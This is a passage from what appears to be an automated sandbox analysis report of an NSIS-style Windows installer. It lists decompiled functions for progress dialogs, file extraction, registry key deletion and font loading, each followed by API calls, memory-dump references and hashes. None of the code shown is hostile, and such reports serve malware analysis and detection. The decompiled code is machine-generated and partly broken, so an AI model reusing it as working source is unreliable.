					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                0x00402dc7
                                                0x00402dd5
                                                0x00402ddb
                                                0x00402ddb
                                                0x00402de9
                                                0x00402deb
                                                0x00402df7
                                                0x00402dfc
                                                0x00402dfe
                                                0x00402dfe
                                                0x00402e09
                                                0x00402e19
                                                0x00402e2b
                                                0x00402e2b
                                                0x00402e33

                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                • wsprintfA.USER32 ref: 00402E09
                                                • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                • SetDlgItemTextA.USER32 ref: 00402E2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                                                • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                0x004027df
                                                0x004027e1
                                                0x004027ed
                                                0x004027f0
                                                0x004027fa
                                                0x004027fe
                                                0x004027fe
                                                0x00402804
                                                0x00402811
                                                0x00402819
                                                0x0040281c
                                                0x00402822
                                                0x00402830
                                                0x00402835
                                                0x00402839
                                                0x0040283c
                                                0x00402845
                                                0x00402851
                                                0x00402855
                                                0x00402858
                                                0x00402862
                                                0x00402887
                                                0x00402869
                                                0x0040286e
                                                0x00402876
                                                0x0040287c
                                                0x00402881
                                                0x00402881
                                                0x0040288e
                                                0x0040288e
                                                0x0040289b
                                                0x004028a1
                                                0x004028b3
                                                0x004028b3
                                                0x004028b9
                                                0x004028b9
                                                0x004028c4
                                                0x004028c5
                                                0x004028c9
                                                0x004028cd
                                                0x004028d3
                                                0x004028d3
                                                0x004028da
                                                0x004022dd
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                • GlobalFree.KERNEL32 ref: 0040288E
                                                • GlobalFree.KERNEL32 ref: 004028A1
                                                • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 004028B9
                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                                                • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404AF5, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
			}



















                                                0x00404afb
                                                0x00404b00
                                                0x00404b08
                                                0x00404b09
                                                0x00404b16
                                                0x00404b1e
                                                0x00404b1f
                                                0x00404b21
                                                0x00404b23
                                                0x00404b25
                                                0x00404b28
                                                0x00404b28
                                                0x00404b2f
                                                0x00404b35
                                                0x00404b35
                                                0x00404b3c
                                                0x00404b43
                                                0x00404b46
                                                0x00404b49
                                                0x00404b49
                                                0x00404b4d
                                                0x00404b5d
                                                0x00404b5f
                                                0x00404b62
                                                0x00404b0b
                                                0x00404b0b
                                                0x00404b12
                                                0x00404b12
                                                0x00404b6a
                                                0x00404b75
                                                0x00404b8b
                                                0x00404b9b
                                                0x00404bb7

                                                APIs
                                                • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                • wsprintfA.USER32 ref: 00404B9B
                                                • SetDlgItemTextA.USER32 ref: 00404BAE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$PB
                                                • API String ID: 3540041739-838025833
                                                • Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                • Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
                                                • Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                • Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402CD0, Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 48%
                                                			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				char _v276;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v276);
						_push(0);
						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v276);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406631(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyA(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                0x00402cdb
                                                0x00402ce4
                                                0x00402ced
                                                0x00402cf9
                                                0x00402d02
                                                0x00402d0c
                                                0x00402d31
                                                0x00402d37
                                                0x00402d3c
                                                0x00402d3d
                                                0x00402d6d
                                                0x00402d46
                                                0x00402d48
                                                0x00402d98
                                                0x00402d9b
                                                0x00000000
                                                0x00402da1
                                                0x00402d57
                                                0x00402d5c
                                                0x00402d5e
                                                0x00000000
                                                0x00000000
                                                0x00402d66
                                                0x00402d6b
                                                0x00402d6c
                                                0x00402d6c
                                                0x00402d79
                                                0x00402d81
                                                0x00402d88
                                                0x00000000
                                                0x00402db1
                                                0x00000000
                                                0x00402d90
                                                0x00402d1c
                                                0x00402d2f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00402d2f
                                                0x00402db7

                                                APIs
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CloseEnum$DeleteValue
                                                • String ID:
                                                • API String ID: 1354259210-0
                                                • Opcode ID: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                • Instruction ID: 3131e3f6e31e27b0aa66d3651422ecf58d36830b066a5e7c74bd8b9791dc988a
                                                • Opcode Fuzzy Hash: 681fed8778fb2982ecb5527b851c998c3744aa6ef2e2e43ab789fcfdd1fcd395
                                                • Instruction Fuzzy Hash: 21215771900108BBEF129F90CE89EEE7A7DEF44344F100476FA55B11A0E7B48F64AA68
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401D65, Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 77%
                                                			E00401D65(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				CHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t58;
				long _t61;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x1b) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x20));
				} else {
					E00402BAC(2);
					 *((intOrPtr*)(__ebp - 0x38)) = __edx;
				}
				_t55 =  *(_t65 - 0x1c);
				 *(_t65 + 8) = _t30;
				_t58 = _t55 & 0x00000004;
				 *(_t65 - 0xc) = _t55 & 0x00000003;
				 *(_t65 - 0x34) = _t55 >> 0x1f;
				 *(_t65 - 0x30) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x24) & 0x0000ffff;
				} else {
					_t38 = E00402BCE(0x11);
				}
				 *(_t65 - 8) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x84);
				asm("sbb edi, edi");
				_t61 = LoadImageA( ~_t58 &  *0x424740,  *(_t65 - 8),  *(_t65 - 0xc),  *(_t65 - 0x7c) *  *(_t65 - 0x34),  *(_t65 - 0x78) *  *(_t65 - 0x30),  *(_t65 - 0x1c) & 0x0000fef0);
				_t48 = SendMessageA( *(_t65 + 8), 0x172,  *(_t65 - 0xc), _t61);
				if(_t48 != _t53 &&  *(_t65 - 0xc) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x28)) >= _t53) {
					_push(_t61);
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                0x00401d65
                                                0x00401d69
                                                0x00401d7e
                                                0x00401d6b
                                                0x00401d6d
                                                0x00401d73
                                                0x00401d73
                                                0x00401d84
                                                0x00401d87
                                                0x00401d91
                                                0x00401d94
                                                0x00401d9c
                                                0x00401dad
                                                0x00401db0
                                                0x00401dbb
                                                0x00401db2
                                                0x00401db4
                                                0x00401db4
                                                0x00401dbf
                                                0x00401dcc
                                                0x00401df3
                                                0x00401e02
                                                0x00401e10
                                                0x00401e18
                                                0x00401e20
                                                0x00401e20
                                                0x00401e29
                                                0x00401e2f
                                                0x004029a5
                                                0x004029a5
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                • Instruction ID: 488f83a01e3392fad3bf683b4443aaeb9baaf514c425c8ec37ca45fc88de17ea
                                                • Opcode Fuzzy Hash: 6bf6946672e698bf1bfe4de63576d549b40da2e57045ab1ce7509431734d3278
                                                • Instruction Fuzzy Hash: E9212A72E00109AFCF15DFA4DD85AAEBBB5EB88300F24417EF911F62A1CB389941DB54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401E35, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 73%
                                                			E00401E35(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402BAC(2);
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				0x40b820->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40b830 = E00402BAC(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x38)) = _t30;
				 *0x40b837 = 1;
				 *0x40b834 = _t15 & 0x00000001;
				 *0x40b835 = _t15 & 0x00000002;
				 *0x40b836 = _t15 & 0x00000004;
				E004062BB(_t9, _t31, _t33, 0x40b83c,  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectA(0x40b820);
				_push(_t18);
				_push(_t33);
				E00406186();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                0x00401e35
                                                0x00401e40
                                                0x00401e42
                                                0x00401e4f
                                                0x00401e66
                                                0x00401e6b
                                                0x00401e78
                                                0x00401e7d
                                                0x00401e81
                                                0x00401e8c
                                                0x00401e93
                                                0x00401ea5
                                                0x00401eab
                                                0x00401eb0
                                                0x00401eba
                                                0x00402620
                                                0x00401569
                                                0x004029a5
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                • GetDC.USER32(?), ref: 00401E38
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                • ReleaseDC.USER32 ref: 00401E6B
                                                • CreateFontIndirectA.GDI32(0040B820), ref: 00401EBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                • String ID:
                                                • API String ID: 3808545654-0
                                                • Opcode ID: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                • Instruction ID: 5097186ed897f0bb8f2c49de76e9dd96fe00b68d7cb2a8ba7479d5b6a1f75869
                                                • Opcode Fuzzy Hash: 58c68d17d92a7b2530b6f57be575cc9bfeb44b1e921b0f803df6e483c56fd12b
                                                • Instruction Fuzzy Hash: 18014072504344AEE7017BA4AE89B9A7FF8E755701F10547AF141B61F2CB790445CB6C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401C2E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 59%
                                                			E00401C2E(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402BAC(3);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402BAC(4);
				 *((intOrPtr*)(_t64 - 0x38)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402BCE(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402BCE(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402BCE();
					_t32 = E00402BCE();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t61 = E00402BAC();
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t41 = E00402BAC(2);
					 *((intOrPtr*)(_t64 - 0x38)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00406186();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                0x00401c2e
                                                0x00401c30
                                                0x00401c37
                                                0x00401c3a
                                                0x00401c3d
                                                0x00401c47
                                                0x00401c4b
                                                0x00401c4e
                                                0x00401c57
                                                0x00401c57
                                                0x00401c5a
                                                0x00401c5e
                                                0x00401c67
                                                0x00401c67
                                                0x00401c6a
                                                0x00401c6e
                                                0x00401c70
                                                0x00401cc5
                                                0x00401cc7
                                                0x00401cd0
                                                0x00401cd8
                                                0x00401cdb
                                                0x00401cdb
                                                0x00401ce4
                                                0x00000000
                                                0x00401c72
                                                0x00401c79
                                                0x00401c7b
                                                0x00401c7e
                                                0x00401c84
                                                0x00401c8b
                                                0x00401c8e
                                                0x00401cb6
                                                0x00401cea
                                                0x00401cea
                                                0x00401c90
                                                0x00401c9e
                                                0x00401ca6
                                                0x00401ca9
                                                0x00401ca9
                                                0x00401c8e
                                                0x00401ced
                                                0x00401cf0
                                                0x00401cf6
                                                0x004029a5
                                                0x004029a5
                                                0x00402a5d
                                                0x00402a69

                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                • Instruction ID: 90c6e89302a946556e44a8134fdeeaca46b2157ebe1368c161caa9607488c25b
                                                • Opcode Fuzzy Hash: fd1638e98ba6d3c211dbcd30864b3267bbc4afbfdbf9ed1ecbf77a0a26ee8f5b
                                                • Instruction Fuzzy Hash: 80216071A44208BEEB05DFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405BC0(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                0x00405bc1
                                                0x00405bd8
                                                0x00405be0
                                                0x00405be0
                                                0x00405be8

                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BC6
                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040344E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405BCF
                                                • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405BE0
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
